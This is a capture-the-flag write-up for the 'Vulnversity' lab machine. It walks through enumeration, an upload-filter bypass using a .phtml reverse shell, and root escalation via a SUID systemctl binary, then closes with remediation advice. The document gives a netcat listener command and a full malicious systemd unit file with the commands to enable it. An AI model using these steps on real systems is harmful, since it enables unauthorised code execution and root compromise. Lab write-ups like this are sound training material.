Target IP: 10.201.67.124 / vul.thm Difficulty: Easy Objective: User (www-data / bill) & Root (root.txt)

1. Executive Summary

“Vulnversity” is a Linux machine hosting a university website on a non-standard port (3333). Initial access is gained by enumerating hidden directories (/internal) and exploiting an Unrestricted File Upload vulnerability. While the server filters standard .php extensions, it fails to block valid alternatives like .phtml. Privilege escalation is achieved by identifying a misconfigured SUID permission on systemctl, allowing the creation of a malicious system service to spawn a root shell.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap service detection.
  • T1190 (Exploit Public-Facing App): Uploading a Web Shell via File Upload Bypass (.phtml).
  • T1548.001 (Setuid and Setgid): Abusing SUID on systemctl (GTFOBins).
  • T1543.002 (Create or Modify System Process: System Service): Defining a malicious service for persistence/escalation.

2. Enumeration

A. Network Scanning

Your Nmap scan revealed a non-standard web port, which is the primary focus.

  • 21/tcp (FTP): vsftpd 3.0.5 (Locked down, no anon access usually).
  • 139/445 (SMB): Samba (Good for enumeration, but web is the path here).
  • 3333/tcp (HTTP): Apache Vuln University.

B. Web Enumeration

You used ffuf to scan the web server on port 3333.

ffuf -u http://vul.thm:3333/FUZZ -w /usr/share/wordlists/dirb/common.txt
  • Result: /internal directory found.
  • Content: An upload form at /internal/index.php.

3. Initial Access: The Extension Bypass

The Vulnerability

The server allows file uploads but employs a Blacklist filter. It blocks the standard .php extension to prevent Remote Code Execution (RCE). However, Apache is often configured to execute other extensions as PHP.

The Bypass

You successfully identified that .phtml was allowed.

  • Blocked: .php, .php3, .php4, .php5.
  • Allowed: .phtml.

Exploitation

  1. Payload: PentestMonkey’s PHP Reverse Shell.
  2. Rename: mv shell.php shell.phtml.
  3. Upload: Upload via /internal/index.php.
  4. Execute: Navigate to /internal/uploads/shell.phtml.
  • Listener: nc -lvnp 4444.

Status: Shell as www-data.


4. Privilege Escalation: SUID Systemctl

A. Enumeration

You searched for binaries with the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

Critical Finding: /bin/systemctl has the SUID bit enabled.

  • Why this is bad: systemctl manages the system’s services (systemd). If it runs as root, it can start/stop services. Since we can create files (in /tmp), we can define our own service.

B. The Exploit (Malicious Service)

The strategy is to create a systemd unit file that executes a command to make /bin/bash a SUID binary. Since the service runs as root, the command runs as root.

1. Create the Unit File: You wrote this directly to /tmp/rootshell.service:

[Unit]
Description=rootshell
 
[Service]
Type=simple
# Copy bash to a new location and make it SUID root
ExecStart=/bin/sh -c 'cp /bin/bash /tmp/bashroot; chmod +s /tmp/bashroot'
 
[Install]
WantedBy=multi-user.target

2. Enable and Start: Since systemctl is SUID, we don’t need sudo to run it, but we do need to reference the full path of our file because it’s not in the standard system path.

/bin/systemctl enable /tmp/rootshell.service
/bin/systemctl start rootshell.service
  • Note: enable links the service (creating the symlink requires root, which SUID provides). start executes the ExecStart command.

3. The Payoff: The service runs instantly. We check /tmp for our new SUID shell.

ls -l /tmp/bashroot
# -rwsr-sr-x 1 root root ... /tmp/bashroot
  • Execute: /tmp/bashroot -p.
  • -p: Preserves privileges (prevents Bash from dropping root privileges when the EUID doesn’t match the UID).

Result:

# whoami
root

Root Flag: /root/root.txt.


5. Remediation (Blue Team)

  1. File Upload Security:
  • Allow-list: Instead of blacklisting extensions (.php), use an allow-list (.jpg, .png only).
  • Disable Execution: Configure the upload directory (/internal/uploads) to disable script execution (e.g., php_flag engine off in Apache or noexec mount).
  1. SUID Auditing:
  • Systemctl: systemctl should never have the SUID bit set. It breaks the security model of Linux. Administrators should use sudo to manage services.
  • Regularly audit SUID binaries: find / -perm -u=s.